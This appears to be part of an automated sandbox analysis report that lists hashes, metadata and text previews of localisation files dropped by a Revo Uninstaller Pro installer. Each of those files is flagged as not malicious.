                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:loKRrsLkYOChte3GW00OKansDxs1ugPaqP9L97jcpvqRtNCOuvMYrcmPulvhvFNO:GRJnsDyYgP5P9LWEZBPCzAObr
                                                                                                                                                                          MD5:00E4EA38C09BE2C82D4062345B74C975
                                                                                                                                                                          SHA1:1644834E917EF74EF374C63D740076C61B18F07F
                                                                                                                                                                          SHA-256:20F8BDF0C06B31434AD9A6D515477A86D84E758490E47DB1724E358A48A650F3
                                                                                                                                                                          SHA-512:7CFC2B303F1B8CB25B63B726491A0062F2184D7E2A60911EB3235E3E8F50167610C043F2C3E0DF32C6DE76C454D2D74597F286988D87BE3D81259AAC3426CE18
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.l.s.k.i./.P.o.l.i.s.h.....W.e.b.L.a.n.g.=.P.L.....T.r.a.n.s.l.a.t.o.r.=.h.i.r.y.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .W.i.d.o.k.....1.0.3. .=. .O.p.c.j.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .N.a.r.z...d.z.i.a.....1.0.6. .=. .T.r.y.b. .B.o.w.c.y.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .S.z.c.z.e.g...B.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.u.j.....1.1.1. .=. .U.s.u.D. .w.p.i.s.....1.1.2. .=. .O.d.[.w.i.e.|.....1.1.3. .=. .C.z.y. .n.a. .p.e.w.n.o. .u.s.u.n..... .z.a.z.n.a.c.z.o.n.y. .o.b.i.e.k.t.?.....1.1.4. .=. .C.z.y. .n.a. .p.e.w.n.o. .o.d.i.n.s.t.a.l.o.w.a... .z.a.z.n.a.c.z.o.n.y. .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.k.t.u.a.l.i.z.u.j.....1.1.6. .=. .P.o.m.o.c.....
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):140588
                                                                                                                                                                          Entropy (8bit):3.4494661461016882
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:L3UBZgoBUk7SJAW+UMwHdaIaSnutDxbheao+fBpdaA1a16Q1D5DerB2Tm:YghYgnutD7/
                                                                                                                                                                          MD5:500FBED3543879F343C8081B2FDF1FF5
                                                                                                                                                                          SHA1:AC859C7013C87DD824C73ED77970BD973762EEE0
                                                                                                                                                                          SHA-256:9436996BABA11BC3CFD246CEB4C3F70185806A5612027990D6999F469E09AC5E
                                                                                                                                                                          SHA-512:D1337F8723E5C3FAD06AFF44E2DE82D7DC9A42614C7F88C465BE28665EEF2374DE75C788D335112CAF54F24562354D2B03175EBC7E567FEE60522E6EA1A1BCFE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .P.o.r.t.u.g.u...s./.P.o.r.t.u.g.u.e.s.e.....W.e.b.L.a.n.g.=.P.T.G.....T.r.a.n.s.l.a.t.o.r.=.L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). . .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.c.t.u.a.l.i.z.a.r. .....1.1.3. .=. .T.e.m. .a. .c.e.r.t.e.z.a. .q.u.e. .d.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.c.i.o.n.a.d.a.?.....1.1.4. .=. .T.e.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):125262
                                                                                                                                                                          Entropy (8bit):3.4481536085983775
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:MOghAQX7wHPV3eonAqBL2h2OUFD5LVpi9:lghv5oK
                                                                                                                                                                          MD5:B5AA8BE80DAE51043BA6408D1D6B107E
                                                                                                                                                                          SHA1:6BE2B588839C87B3D8F25C3F5BEB7975AECB98E0
                                                                                                                                                                          SHA-256:E20F73F5E342B823B79F1C8C4D7EEF101A09127DB0700FCD79FDEF43F3CC25D7
                                                                                                                                                                          SHA-512:7CBFFEF592359D953A12788C558EF6AB31B468AA5ECC774FD3D22E3279C82DBAF16B1849F1B99A820F189FA36FFFA4564A2C3D7EC5042EB191FF390BB943828C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. .(.P.o.r.t.u.g.a.l.).....W.e.b.L.a.n.g.=.P.T.G.S.T.D.....T.r.a.n.s.l.a.t.o.r.=.M.a.n.u.e.l.a. .S.i.l.v.a. .-. .L.u.i.s. .N.e.v.e.s. .(.l.u.i.s...a...n.e.v.e.s.@.s.a.p.o...p.t.). .-. .P.l.e.a.s.e. .d.o.n.'.t. .r.e.m.o.v.e. .t.h.e. .t.r.a.n.s.l.a.t.i.o.n. .w.i.t.h. .A.O. .1.9.9.0... .....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...0...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o. .P.e.s.q.u.i.s.a. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. ...c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .E.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (724), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):131952
                                                                                                                                                                          Entropy (8bit):3.471989974502818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:FrEbxaRaTtwkYAUc0tPNfKp+2MS1TXjUiU8v908:6bxaRaTqkVU3lNfKp+2MS1TXjUZWt
                                                                                                                                                                          MD5:BA3D16BF985F428DAB06AAA6CE7CE7B4
                                                                                                                                                                          SHA1:C8980ECE865ECD907A0FE43B8D2E898BE3276DFF
                                                                                                                                                                          SHA-256:F17E90AAC63F2E9630C81D73B9756A41B951874C44A483AA4E354D013E70D8B8
                                                                                                                                                                          SHA-512:0140E007F63F4BB84F6340C153E21138504292B1EA6EA7483747212CF4D437C5D449FE10989B4E341D9B3554B20BD780EBADC3D61C481FB25BB3F6653A1557CD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. ./. .P.o.r.t.u.g.u.e.s.e.(.B.r.a.s.i.l.).....W.e.b.L.a.n.g.=.P.T.-.B.R.....T.r.a.n.s.l.a.t.o.r.=.H...l.i.o. .d.e. .S.o.u.z.a. ./. .R.u.l.i.e.n. .O.l.d.a.n.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .E.x.i.b.i.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o.\.n.C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3. .=. .D.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.i.o.n.a.d.a.?.....1.1.4. .=. .D.e.s.e.j.a. .d.e.s.i.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (746), with CRLF, CR line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):138760
                                                                                                                                                                          Entropy (8bit):3.5938846070402
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:HN2MUMqfeZIyimlMWqCZLhewtbOIYe/1ifCWUINoE/hOsbg00p:t9UKXZ1eSjVA/U
                                                                                                                                                                          MD5:C76ADB4BB2BDB3722F0D0AA395F16262
                                                                                                                                                                          SHA1:B4594519DD221ECAEFC0D90909157F9C124811CE
                                                                                                                                                                          SHA-256:4635B47EFC36101D5AC7BBE3D529EF4850A2785CA59B8DD08541873D2579C083
                                                                                                                                                                          SHA-512:ABB1FCA558326124605D24B79670871B30E91977F1DA14DEC36AE61B5D3B53FB294ED80A3EF111B138B2970F9D3D22C7FAAB810A87613CD035614D4A05D69F33
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.R.o.m...n... ./. .R.o.m.a.n.i.a.n.....W.e.b.L.a.n.g.=.R.O.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.a.n.d.r.u. .B.o.g.d.a.n. .M.u.n.t.e.a.n.u.,. .M.a.r.i.n.e.l. .C.i.p.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.d.e.r.e.....1.0.3. .=. .O.p...i.u.n.i.....1.0.4. .=. .D.e.z.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .U.n.e.l.t.e.....1.0.6. .=. .V...n...t.o.r.....1.0.7. .=. .L.i.s.t.......1.0.8. .=. .I.c.o.a.n.e.....1.0.9. .=. .D.e.t.a.l.i.i.....1.1.0. .=. .D.e.z.i.n.s.t.a.l.e.a.z.......1.1.1. .=. ...n.l...t.u.r.......1.1.2. .=. ...m.p.r.o.s.p...t.e.a.z.......1.1.3. .=. .S.i.g.u.r. .v.r.e.i. .s... ...n.l...t.u.r.i. .i.n.t.r.a.r.e.a. .s.e.l.e.c.t.a.t...?.....1.1.4. .=. .S.i.g.u.r. .v.r.e.i. .s... .d.e.z.i.n.s.t.a.l.e.z.i. .p.r.o.g.r.a.m.u.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (770), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):136156
                                                                                                                                                                          Entropy (8bit):3.9772752876308854
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:Ugzuz4NjXBv1p4Yo2PklcxThfaZE2kYK1X5+P3b1rIdkXmU+g9X:Ug86XBv1p4Yo2PklcxThfaZE2DP3b1rX
                                                                                                                                                                          MD5:A3F615CEE1B2AB1423853E0DCE67812C
                                                                                                                                                                          SHA1:80EF64ABB8D7C8DBDEA00FD5552956F1750F3FF5
                                                                                                                                                                          SHA-256:C4A2025D189CB616B4CFC45BAC348CF36D583964EA1936DF309C03CDA5C0104C
                                                                                                                                                                          SHA-512:5D4C7AEA6E50B1DD4BE63357F04C3C1DA148BF6D5F8A55E797B405046EDBB8CF9858407F6A663F78A372992D6888A64ADB6AAE605C21C6B9ABF750CAAA18EDC9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. . .C.A.A.:.8.9./.R.u.s.s.i.a.n.....W.e.b.L.a.n.g.=.R.U.S.....T.r.a.n.s.l.a.t.o.r. .=. .V.S. .R.e.v.o. .G.r.o.u.p.,. .e.d.i.t.e.d. .b.y. .L.u.b.e.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...8.4.....1.0.3. .=. ...0.@.0.<.5.B.@.K.....1.0.4. .=. ...5.8.=.A.B.0.;.;.O.F.8.O.....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.K.....1.0.6. .=. . .5.6.8.<. .>.E.>.B.K.....1.0.7. .=. .!.?.8.A.>.:.....1.0.8. .=. ...=.0.G.:.8.....1.0.9. .=. .".0.1.;.8.F.0.....1.1.0. .=. .#.4.0.;.8.B.L.....1.1.1. .=. .#.4.0.;.8.B.L.....1.1.2. .=. ...1.=.>.2.8.B.L.....1.1.3. .=. ...K. .4.5.9.A.B.2.8.B.5.;.L.=.>. .E.>.B.8.B.5. .C.4.0.;.8.B.L. .2.K.1.@.0.=.=.K.9. .M.;.5.<.5.=.B. .8.7. .@.5.5.A.B.@.0.?.....1.1.4. .=. ...K. .4.5.9.A.B.2.8.B.5.;.L.=.>. .E.>.B.8.B.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (436), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):96936
                                                                                                                                                                          Entropy (8bit):3.9548685823094414
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:Mlyvi0HQGqlUfM9T4xYIvZttVc1bVBuqqe25IHo06TVp0DK9k8hLoS60thmlLqtK:Mlyvi0HQGqlUfM54xYIvZttVc1bVBuqZ
                                                                                                                                                                          MD5:8A38541BEFDD4A83B3413AF88AB27792
                                                                                                                                                                          SHA1:977AE354F1D8529384C241B87232BAAD2A9217C5
                                                                                                                                                                          SHA-256:D005F31F65527C1C409B1B43BA1BD0020310C1DDCAB58964BE5F763037F0314D
                                                                                                                                                                          SHA-512:C1D954B632DF9DB0F7788E10074BF32DFC306B6D933EBE0A8F778FD831EBFB5DD4908B411430B911515E2AA676C8244E45B3BC4574793B62B193FDACDAECA080
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.!.@.?.A.:.8./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...>.A.B.0.2.:.5.....1.0.4. .=. ...5.8.=.A.B.0.;.5.@.....1.0.5. .=. ...;.0.B.8.....1.0.6. .=. ...@.5.A.@.5.B.0.Z.5.....1.0.7. .=. ...8.A.B.0.....1.0.8. .=. ...:.>.=.5.....1.0.9. .=. ...5.B.0.Y.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.X.....1.1.1. .=. .#.:.;.>.=.8. .C.=.>.A.....1.1.2. .=. ...A.2.5.6.8.....1.1.3. .=. .#.:.;.>.=.8.B.8. .>.7.=.0.G.5.=.8. .C.=.>.A.?.....1.1.4. .=. ...5.8.=.A.B.0.;.8.@.0.B.8. .>.7.=.0.G.5.=.8. .?.@.>.3.@.0.<.?.....1.1.5. .=. ...>.3.@.0.4.Z.0.....1.1.6. .=.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (446), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):97878
                                                                                                                                                                          Entropy (8bit):3.537880363749942
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:woApxpwVcmmL4Htk5SWgduiI/Qyi+9QEo62eTLDme0HLZzzAiY+4mc0MzpUnjhq4:sxpcCSWV/Qa7vb0HFHlbRcVzqt6pTkd
                                                                                                                                                                          MD5:6FF7FBB4F81CEF6CEE58E8A9A3973B23
                                                                                                                                                                          SHA1:FDAA6816A3172EB4FB336B364B7DCDEC9F807412
                                                                                                                                                                          SHA-256:E57B607071C548D701BDD2700D7D70B554FA27292CAE1043F622597235CBA1EF
                                                                                                                                                                          SHA-512:FD623CA0205134A94C8D8A46722F6623802C55C69F22DD83F6C4DA32107337BEA20A5B4BE4307151327FF6D5AEFB0FDABB323D903B7789F42CD4907C6E49DDB3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.r.p.s.k.i./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):58204
                                                                                                                                                                          Entropy (8bit):5.700930679207834
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:lo5zGJ0/0BCAJQbmrd16Qo6DzKCvytFvNOv+0syWNgZC3L51N5K0gI9+O/nuGNLM:KzmlQodpo6ktF1++0DWNgW6fuHE8M7
                                                                                                                                                                          MD5:6CB9F788594E515436E812AF86CE6971
                                                                                                                                                                          SHA1:3E2EFCD077D3E91C1B22C511EBB8F9DC8087C3DF
                                                                                                                                                                          SHA-256:C5AC1F6567EB3FDC2BB7809853F8F8D90D0DCEFCAC1E7EE881316AEFDE3D65EC
                                                                                                                                                                          SHA-512:70FD68DFB13EB4EFCA05E9963D64E779EFF6CF4B3DCFD9AFA54E4374D91B2F82C6A3AF023F28A53057EE0C944FEE847896723E0EBCE4854308EA0159008913CA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=..{SO-N.e ./. .S.i.m.p.l.i.f.i.e.d.C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=.S.C.H.....T.r.a.n.s.l.a.t.o.r.=.Y.i. .L.a.n. .(.m.e.@.y.i.l.a.n.j.u...c.o.m.).,.f.a.i.r.y.c.n.@.1.3.9...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...6.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...V....1.0.3. .=. ...y.....1.0.4. .=. .xS}.hV....1.0.5. .=. ..]wQ....1.0.6. .=. ..s.N!j._....1.0.7. .=. ..Rh.....1.0.8. .=. ..V.h....1.0.9. .=. ..~......1.1.0. .=. .xS}.....1.1.1. .=. . Rd.ag.v....1.1.2. .=. .7R.e....1.1.3. .=. ..`nx.[.. Rd.@b..ag.v.T?.....1.1.4. .=. ..`nx.[.. Rd.@b...z.^.T?.....1.1.5. .=. ..R.f.e....1.1.6. .=. ..^.R....1.1.7. .=. .S_MR.]wQ.^.R..........1.1.8. .=. .;Nu...........1.1.9. .=. .sQ.N..........1.2.0. .=. ..`.N/f.|.~.{.tXT!.....1.2.1. .=. ..`nx.[.. Rd.@b...|.~.~.N.T?.\.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (510), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):117334
                                                                                                                                                                          Entropy (8bit):3.716232017222656
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:zoD4FEnB1D2yGMrJQK141CsyubT5GZGzC/v9OQ8+:zOV2LO
                                                                                                                                                                          MD5:9E9BB9C33D54BE4D2A74E4540F99585D
                                                                                                                                                                          SHA1:6F3733A4C377EBCDCC10E5811611AD26E6A8857F
                                                                                                                                                                          SHA-256:830BBF9501D2BC51E52AC755FA26090298C5E6895BC9091AED97F506E0C9D4E8
                                                                                                                                                                          SHA-512:75352F8809FD54C17026FE3220923398C18EE20B219F0C0E6970DA80F7483B63039FD4FF32632AD65C3B43B4EB3A345FF30AF59D9AA3AFB3AD97671B78DA0C4E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.l.o.v.e.n...i.n.a./.S.l.o.v.a.k.....W.e.b.L.a.n.g.=.S.K.....T.r.a.n.s.l.a.t.o.r.=.L.u.m.i.r. .-. .l.u.m.i.r.e.s.k.u.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.e.n.i.e.....1.0.3. .=. .N.a.s.t.a.v.e.n.i.a.....1.0.4. .=. .O.d.i.n.a.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.a.....1.0.7. .=. .Z.o.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .P.o.d.r.o.b.n.o.s.t.i.....1.1.0. .=. .O.d.i.n.a.t.a.l.o.v.a.e.....1.1.1. .=. .O.d.s.t.r...n.i.e.....1.1.2. .=. .O.b.n.o.v.i.e.....1.1.3. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.s.t.r...n.i.e. .v.y.b.r.a.t... .p.o.l.o.~.k.u.?.....1.1.4. .=. .U.r...i.t.e. .c.h.c.e.t.e. .o.d.i.n.a.t.a.l.o.v.a.e. .v.y.b.r.a.t...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):133602
                                                                                                                                                                          Entropy (8bit):3.516276711475207
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:Vk8NAAdeen1o1CGzbaTe2awmWp1FWgyLR8c3O:mW
                                                                                                                                                                          MD5:C818A5793997CE34224359777E094BD5
                                                                                                                                                                          SHA1:3A64A87007A2793FEDEE099B283A3F0383BF2F74
                                                                                                                                                                          SHA-256:94123A86FA77F670133E4849FCFCD0564CBA01178075E778B67AB790C619E9AB
                                                                                                                                                                          SHA-512:BD7D40ABCA01A1CB1397F7332F77FE52579AAB8ED33585C7E7787C9991C768E2BF062D3367A9A36B3A2B5404CC6E63085933241FDBC4676751435194427DCF9C
                                                                                                                                                                          Malicious:false
